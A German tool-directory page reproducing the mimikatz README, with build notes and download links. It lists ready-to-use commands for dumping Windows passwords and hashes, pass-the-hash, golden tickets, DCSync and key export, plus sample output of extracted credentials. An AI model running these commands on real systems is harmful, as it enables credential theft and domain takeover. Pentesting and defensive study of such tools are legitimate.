Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
mimikatz — Tool zum Extrahieren von Windows-Anmeldeinformationen (Passwörter, Hashes, Kerberos-Tickets) aus dem Speicher und zum Ausführen von Pass-the-Hash-, Pass-the-Ticket- und Golden-Ticket-Angriffen. | Kitploit
Tools/GitHubGitHub/parrotsec/mimikatz
Privilege EscalationSpeicherforensikPasswortangriffeExploitationLaterale BewegungPenetrationstestsAuthentifizierungRed Teaming
GitHubparrotsec/mimikatz

mimikatz

Tool zum Extrahieren von Windows-Anmeldeinformationen (Passwörter, Hashes, Kerberos-Tickets) aus dem Speicher und zum Ausführen von Pass-the-Hash-, Pass-the-Ticket- und Golden-Ticket-Angriffen.

Repository anzeigen
2.6k3564vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

mimikatz

mimikatz ist ein Tool, das ich erstellt habe, um C zu lernen und ein paar Experimente mit der Windows-Sicherheit zu machen.

Es ist mittlerweile bekannt dafür, Klartext-Passwörter, Hashes, PIN-Codes und Kerberos-Tickets aus dem Speicher zu extrahieren. mimikatz kann außerdem Pass-the-Hash, Pass-the-Ticket oder Golden Tickets erstellen.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Aber das ist noch nicht alles! Crypto, Terminal Server, Events, ... viele Informationen gibt es im GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki oder auf http://blog.gentilkiwi.com (auf Französisch, ja).

Wenn du es nicht selbst bauen möchtest, sind Binärdateien verfügbar unter https://github.com/gentilkiwi/mimikatz/releases

Schnellanwendung

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz liegt in Form einer Visual-Studio-Projektmappe und eines WinDDK-Treibers vor (optional für die Hauptfunktionen), daher sind folgende Voraussetzungen nötig:

  • für mimikatz und mimilib : Visual Studio 2010, 2012 oder 2013 für Desktop (2013 Express für Desktop ist kostenlos und unterstützt x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • für den mimikatz-Treiber, mimilove (und die ddk2003-Plattform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz verwendet SVN zur Versionskontrolle, ist aber jetzt auch mit GIT verfügbar! Du kannst beliebige Tools zum Synchronisieren verwenden, sogar das integrierte GIT in Visual Studio 2013 =)

Synchronisieren!

  • GIT-URL ist : https://github.com/gentilkiwi/mimikatz.git
  • SVN-URL ist : https://github.com/gentilkiwi/mimikatz/trunk
  • ZIP-Datei ist : https://github.com/gentilkiwi/mimikatz/archive/master.zip

Projektmappe erstellen

  • Nach dem Öffnen der Projektmappe: Build / Build Solution (Du kannst die Architektur ändern)
  • mimikatz ist jetzt erstellt und einsatzbereit! (Win32 / x64 oder sogar ARM64, wenn Du Glück hast)
    • Du kannst den Fehler MSB3073 bezüglich _build_.cmd und mimidrv erhalten; das liegt daran, dass der Treiber ohne Windows Driver Kit 7.1 (WinDDK) nicht erstellt werden kann, aber mimikatz und mimilib sind in Ordnung.

ddk2003

Mit dieser optionalen MSBuild-Plattform kannst du die WinDDK-Build-Tools und die standardmäßige msvcrt-Laufzeit verwenden (kleinere Binärdateien, keine Abhängigkeiten).

Für diese optionale Plattform sind Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 und Visual Studio 2010 Pflicht, selbst wenn du danach Visual Studio 2012 oder 2013 verwenden möchtest.

Befolge die Anweisungen:

  • http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Lizenz

CC BY 4.0-Lizenz - https://creativecommons.org/licenses/by/4.0/

mimikatz braucht Kaffee, um entwickelt zu werden:

  • PayPal: https://www.paypal.me/delpy/

Autor

  • Benjamin DELPY gentilkiwi, du kannst mich über Twitter ( @gentilkiwi ) oder per E-Mail ( benjamin [at] gentilkiwi.com ) kontaktieren
  • Die DCSync- und DCShadow-Funktionen im Modul lsadump wurden zusammen mit Vincent LE TOUX geschrieben; du kannst ihn per E-Mail ( vincent.letoux [at] gmail.com ) kontaktieren oder seine Website besuchen ( http://www.mysmartlogon.com )

Dies ist eine persönliche Entwicklung, bitte respektiere ihre Philosophie und nutze sie nicht für schlechte Dinge!

Tool herunterladen